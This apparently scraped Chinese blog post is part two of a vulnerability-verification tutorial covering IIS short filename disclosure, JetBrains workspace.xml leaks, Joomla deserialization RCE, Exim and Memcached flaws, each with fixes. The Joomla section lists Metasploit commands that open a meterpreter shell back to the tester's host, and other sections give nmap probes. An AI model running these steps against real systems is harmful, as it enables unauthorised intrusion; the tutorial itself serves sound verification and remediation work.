各类高危漏洞介绍及验证方式教程(二)

news2024/11/26 15:47:30

 本期整理的漏洞验证教程约包含50多类漏洞,分多个章节编写,可从以下链接获取全文:

各类高危漏洞验证方式.docx (访问密码: 1455)

搭建dvwa测试环境基础教程.docx(访问密码: 1455)

web逻辑漏洞挖掘快速入门基础教程.docx (访问密码: 1455)

06 IIS短文件名泄露漏洞

0x0A:漏洞简介

Internet Information Services(IIS,互联网信息服务)是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。Microsoft IIS在实现上存在文件枚举漏洞,攻击者可利用此漏洞枚举网络服务器根目录中的文件。

0x0B:漏洞危害

攻击者可以利用该漏洞猜解后台地址和敏感文件甚至直接下载对应文件,或对IIS服务器中的.Net Framework进行拒绝服务攻击。

0x0C:漏洞验证

  1. 打开云监测对应测试URl,如果现实Bad Request(状态码400),则说明漏洞存在(文件并不存在)

  1. 如果测试URL并不会显示Bad Request,则说明漏洞不存在。

  1. 在存在漏洞的前提下,手工测试如下链接:www.ytnt.zfjy.cn/web*~1*/a.asp,返回状态码404,说明相应文件路径(文件夹)存在。

【PS:】我们也可以使用响应的POC来验证此漏洞。

0x0D:漏洞修复建议

三种修复方案只有第二和第三种能彻底修复该问题,可以联系空间提供商协助修改.

方案1.

修改注册表HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisable8dot3NameCreation的值为1,或者,可以直接点此下载,然后运行,再重启下机器。

(此修改只能禁止NTFS8.3格式文件名创建,已经存在的文件的短文件名无法移除)。该修改不能完全修复,只是禁止创建推荐使用后面的修复建议

方案2.

如果你的web环境不需要asp.net的支持你可以进入Internet 信息服务(IIS)管理器 --- Web 服务扩展 - ASP.NET 选择禁止此功能。(推荐)

方案3.升级net framework 至4.0以上版本.(推荐)

07 JetBrains IDE workspace.xml文件泄露

0x0A:漏洞简介

网站存在JetBrains系列IDE的工作区文件,可以泄露整个工程的目录结构信息。

JetBrains是一家捷克的软件开发公司,该公司最为人所熟知的产品是Java编程语言开发撰写时所用的集成开发环境:IntelliJ IDEA。

相关影响IDE如下如下:* IntelliJ IDEA - 一套智慧型的Java整合开发工具,特别专注与强调程式师的开发撰写效率提升

*PHPStorm 7.0 发布,PHP 集成开发工具

*PyCharm 3发布,智能Python集成开发工具

*RubyMine -RubyMine 是一个为Ruby 和Rails开发者准备的IDE,其带有所有开发者必须的功能,并将之紧密集成于便捷的开发环境中。

*WebStorm8.0 发布,智能HTML/CSS/JS开发工具

*AppCode - 开发的ObjC的IDE,是一个XCode的替代物

0x0B:漏洞危害

通过下载workspace.xml,可直接获取整个工程的目录结构,发现敏感文件,为渗透中收集信息、发现漏洞提供了极大的便利。

0x0C:漏洞验证

打开测试URL,即相应的workspace.xml文件,会看到文件内容,证明此漏洞存在。

0x0D:漏洞修复建议

1、删除.idea目录

2、如使用git则

修改配置文件,隐藏workspace.xml:

.gitignore 中要写上 workspace.xml

如果已经commit workspace.xml 必须执行以下命令

$ git rm --cached .idea/workspace.xml

08 joomla反序列化任意代码执行漏洞

0x0A:漏洞简介

joomla反序列化任意代码执行漏洞,

0x0B:漏洞危害

该漏洞影响了 1.5 到 3.4.5 的所有版本,漏洞利用无须登录,直接在前台即可执行任意PHP代码。

0x0C:漏洞验证

使用MSF

use  multi/http/joomla_http_header_rce

set RHOST 目标host

set RPORT 目标端口

set LHOST 自己的外网host

exploit

session建立,进入meterpreter

执行getuid,可看到其当前用户名称,说明漏洞存在

0x0D:漏洞修复建议

1.修改 Joomla 根目录 configuration.php ,把 $session_handler 的值改为none,会将session存储引擎设为文件系统。 把 PHP 版本升到到 5.6.13 或更高的版本。

2.登录Joomla后台把程序升级到 3.4.6 或更高的版本。

09 linux下邮件传输exim溢出漏洞(CVE-2018-6789)/Exim服务器BDAT指令远程代码执行漏洞(CVE-2017-16943)

0x0A:漏洞简介

Exim是剑桥大学开发的消息传输代理(MTA),用于连接到Internet的Unix系统。此次漏洞是利用Exim的base64解码函数中的溢出漏洞,利用此漏洞,攻击者能够在受影响的应用程序上下文中执行任意代码,并且如果攻击尝试失败依旧可能成拒绝服务。

0x0B:漏洞危害

该漏洞可导致

1.远程恶意代码执行。

2.服务器上数据被盗取或者丢失。

3.服务器不可用。

0x0C:漏洞验证

根据测试URL中给出的端口号,用nmap查询相关服务信息。

nmap -p 端口号 -sV 网站地址

可看到VERSION下服务版本号为4.89,小于4.9,说明漏洞存在

0x0D:漏洞修复建议

Exim升级到4.90.1或以上

10 Memcached 拒绝服务漏洞

0x0A:漏洞简介

Memcached是一个自由开源的,高性能,分布式内存对象缓存系统。

Memcached version < 1.4.33 的版本存在三个整数溢出漏洞:

漏洞编号

CVE-2016-8704 : Memcached Append/Prepend 远程代码执行漏洞

CVE-2016-8705 :Memcached Update 远程代码执行漏洞

CVE-2016-8706 :Memcached SASL身份验证远程代码执行漏洞

0x0B:漏洞危害

攻击者可以向服务器发送一个精心构造的Memcached命令利用该漏洞:

1.窃取在Memcached中存放的业务数据

2.导致Memcached服务崩溃从而拒绝服务

0x0C:漏洞验证

验证方式:使用nmap对目标进行相应端口的扫描

命令: nmap -p 11211 $url

STATE 为 open 说明漏洞存在。(注:如状态为filtered,可能本地发包过程中被过滤,可尝试使用外网进行扫描)

0x0D:漏洞修复建议

解决方案:

1.强烈建议用户将Memcached升级到1.4.33及以上版本,升级方法:

访问官方网站下载最新版本

http://www.memcached.org/downloads

2.禁止外网访问Memcached 11211端口

Microsoft Windows:windows+r调用运行>输入secpol.msc打开安全策略>配置ip安全策略>禁止外网访问11211端口

Linux:使用如下命令[iptables -A INPUT –p tcp --dport 11211 -i 外网网卡名 -j drop]禁止外网访问11211端口。

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1075685.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

工作杂记-YUV的dump和read

工作小记-YUV的dump和read 工作杂记-YUV的dump和read利用dump生成图片 yuv2imgyuv2img代码 工作杂记-YUV的dump和read 工作中涉及到模型验证相关的工作&#xff0c;这里是三个模型的共同作用&#xff0c;在感知模型读取图片的时候&#xff0c;把输入替换成自己给定的输入&…

Python中如何快速解析JSON对象数组

嗨喽~大家好呀&#xff0c;这里是魔王呐 ❤ ~! python更多源码/资料/解答/教程等 点击此处跳转文末名片免费获取 由于浏览器可以迅速地解析JSON对象&#xff0c;它们有助于在客户端和服务器之间传输数据。 本文将描述如何使用Python的JSON模块来传输和接收JSON数据。 JavaSc…

优思学院|揭秘六西格玛:七大迷思你不可不知!

六西格玛的核心理念起源于1970年在摩托罗拉公司诞生。其基本精神一直是持续改进和提升品质&#xff0c;随后在各国呈爆炸性的发展。自2000年开始引进中国后&#xff0c;已经过了约16年的应用。但以2017年的角度回顾中国整体六西格玛的应用广度及熟悉度&#xff0c;发现六西格玛…

【ftp篇】 vsftp(ftp) 每天生成一个动态密码

这里写目录标题 前言为什么需要动态每日生成一个密码&#xff1f;编写脚本定时任务java对应的代码 前言 社长最近接到一个需求&#xff0c;需要ftp每天动态生成一个密码 为什么需要动态每日生成一个密码&#xff1f; 在软硬件通讯过程中&#xff0c;就以共享单车为例&#xff0…

Java解析E文件工具类

import lombok.extern.slf4j.Slf4j;import java.io.*; import java.nio.charset.StandardCharsets; import java.util.ArrayList; import java.util.Arrays; import java.util.List;/*** Description E文件工具类*/ Slf4j public class EFileUtils {/*** 读字符串* param text …

智慧公厕的原理与优势,了解一种更智能的卫生设施

智慧公厕是一种基于现代科技的智能化卫生设施&#xff0c;它的出现给人们的生活带来了巨大的改变和便利。本文将详细介绍智慧公厕的原理和优势&#xff0c;让我们一起了解一种更智能的卫生设施。 智慧公厕的原理主要基于物联网技术。通过将公厕内部各种设备和设施连接到互联网…

Java使用Hutool工具包将汉字转换成汉语拼音

主题&#xff1a;使用Java将汉字转换成拼音 介绍 在Java开发中&#xff0c;有时候我们需要将汉字转换成拼音&#xff0c;以方便进行数据处理、搜索和排序等操作。本文将介绍如何使用Hutool和Pinyin4j这两个Java库来实现汉字转拼音的功能。 依赖库介绍 在开始之前&#xff0c;…

无人直播矩阵系统源码开发------

全自动无人直播系统是一款让商家和企业实现无人直播的系统软件&#xff0c;让商家在门店直播卖货&#xff0c;实现解放双手&#xff0c;无需过多的人工干预。为了满足不同用户的需求&#xff0c;我们推出了OEM功能&#xff0c;让用户可以轻松地将该系统集成到自己的应用程序中。…

软考高项-第九章:项目范围管理

重要知识点&#xff1a; 以上总结&#xff0c;仅供参考。

视频通话中的Camera操作

视频通话也有打开本地摄像头预览的场景&#xff0c;但打开本地Camera预览逻辑&#xff0c;并非在Dailer APP中实现&#xff0c;具体流程图如下。 Dialer app中只调用 1、setCamera用于打开摄像头 相关动作在Ims apk中实现&#xff0c;open函数最后调用了VTSource.java中的doOp…

Python+Pickle/Parquet/HDF5...不同文件格式存储模式下的量化因子计算性能对比

在量化交易中&#xff0c;基于金融市场 L1/L2 报价和交易高频数据进行高频因子计算是一项常见的投研需求。随着金融市场数据量的不断增加&#xff0c;传统的关系数据库已经难以满足大规模数据的存储和查询需求。为了应对这一挑战&#xff0c;一部分用户选择了分布式文件系统&am…

2023年中国在线语言教育行业发展趋势分析:预计2026年在线语言教育市场规模有望实现1182.3亿元[图]

在线语言教育是指在信息化时代的背景下&#xff0c;使用电脑、手机、平板等基于网络的工具在任何地方、任何时间都可以对语言进行学习的一种教育方式&#xff0c;包括校内在线语言教育和校外在线语言教育。在线语言教育是对未来教育模式的探索&#xff0c;以数字化为杠杆&#…

03_学习springdoc与微服务结合_简述

文章目录 1 前言2 基本结构3 网关的配置3.1 ✍️ pom.xml 引入依赖3.2 &#x1f33f; application.yml 的配置3.2.1 Gateway 的配置3.2.2 Eureka Client 的配置3.2.3 Springdoc 的配置 3.3 Springdoc 配置类 4 影片服务 backend-film 的配置4.1 ✍️ pom.xml 引入依赖4.2 &…

Go语句与表达式深度解析:全案例手册

目录 语句1. 声明语句1.1 变量声明1.2 常量声明 2. 赋值语句3. 控制流语句3.1 条件语句if语句switch语句 3.2 循环语句for语句 3.3 跳转语句break语句continue语句return语句goto语句 4. 其他语句4.1 defer语句4.2 go语句 实战案例 表达式介绍、详解、举例1. 基础表达式1.1 字面…

在线免费无时长限制录屏工具 - 录猎在线版

需要录屏的小伙伴注意啦&#xff0c;想要长时间录制又不想花钱的&#xff0c;可以看下这款在线版录屏软件 —— 录猎在线版&#xff0c;一个录屏软件所需要的基本功能它都有&#xff0c;设置录制范围、录制的声音来源、摄像头也能录制的。同时它是支持Windows和Mac系统的&#…

Flink session集群运维

1、集群job manager挂了 kubectl describe pod session-deployment-only-84b8d674c7-ckl9w -n flink kubectl get pod -n flink -owide kubectl describe pod session-deployment-only-84b8d674c7-ms758 -n flink 两个job manager都挂了 准备重新部署集群 删除操作(删除fli…

GTX314L国产替代SI314—低功耗14通道电容触摸传感器芯片

Si314是一款具有自动灵敏度校准功能的14通道电容传感器&#xff0c;其工作电压范围为1.8~5.5V。 Si314设置休眠模式来节省功耗&#xff0c;此时&#xff0c;功耗电流为10uA3.3V。 Si314各个感应通道可实现独立使能、校准、灵敏度调节&#xff0c;可以确保可靠性&#xff0c;且具…

Mysql创建新用户控制权限信息

目录 登录 进入mysql数据库 创建新用户及设置密码 设置用户可远程连接登录 刷新权限 限制新用户只能从特定的主机或IP地址访问MySQL服务器 限制用户只对特定数据库的访问权限 限制用户只能访问特定数据库中的特定表 撤销给用户授予的特定权限 查看用户的权限信息 注 …

力扣:129. 求根节点到叶节点数字之和(Python3)

题目&#xff1a; 给你一个二叉树的根节点 root &#xff0c;树中每个节点都存放有一个 0 到 9 之间的数字。 每条从根节点到叶节点的路径都代表一个数字&#xff1a; 例如&#xff0c;从根节点到叶节点的路径 1 -> 2 -> 3 表示数字 123 。 计算从根节点到叶节点生成的 所…

Android攻城狮学鸿蒙-配置

1、config.json配置 鸿蒙中的config.json应该类似于Android开发中Manifest.xml&#xff0c;可以进行页面的配置。根据顺序&#xff0c;会识别启动应用的时候&#xff0c;要打开哪个界面。 2、 Ability详解&#xff0c;以及与Android的Activity对比。 他人的学习文章连接&…